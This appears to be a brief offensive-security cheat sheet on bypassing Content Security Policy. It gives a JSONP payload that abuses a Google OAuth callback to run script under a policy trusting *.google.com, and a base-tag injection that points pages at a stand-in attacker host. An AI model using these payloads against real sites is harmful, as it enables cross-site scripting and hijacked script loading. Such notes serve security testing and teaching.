Content Security Policy (CSP) Bypass

Google JSONP CSP Bypass

If the target server is accepting addresses from Google, use the

Content-Security-Policy: default-src 'self'; script-src *.google.com

<html>
    <head>...</head>
    <body>
        <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1);"></script>
    </body>
</html>

missing base-uri

<base href="https://attacker.io/">

results matching ""

No results matching ""